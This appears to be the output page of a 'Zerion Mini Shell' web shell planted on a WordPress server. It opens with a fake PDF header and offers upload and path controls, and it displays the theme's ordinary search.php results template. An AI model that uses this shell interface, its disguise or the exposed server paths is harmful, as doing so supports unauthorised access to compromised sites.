%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/1857783/root/var/www/tif-dev/wp-content/themes/inkfactory/
Upload File :
Create Path :
Current File : //proc/1857783/root/var/www/tif-dev/wp-content/themes/inkfactory/search.php

<?php

/**
 * The template for displaying search results pages
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#search-result
 *
 * @package Inkfactory
 */

get_header();
?>
<div class="container">

<!-- Breadcrumbs  -->
<?php
if (function_exists('yoast_breadcrumb')) {
	yoast_breadcrumb('<div class="breadcrumbs"><div class="breadcrumbs__wrapper">', '</div></div>');
}
?>

<div class="news">
	<div class="news__row">
		<?php while (have_posts()) : the_post(); ?>
			<div class="news__item">
				<div class="news__body">
					<p class="news__date"><?php the_date(); ?></p>
					<a href="<?php the_permalink(); ?>" class="news__title"><?php the_title(); ?></a>
					<p class="news__text"><?php the_excerpt(); ?></p>
				</div>
			</div>
		<?php endwhile; ?>
	</div>
</div>

<!-- Pagination -->
<?php wp_custom_pagination(); ?>

</div>

<?php get_template_part('template-parts/subscribe') ?>

<?php get_footer(); ?>

Zerion Mini Shell 1.0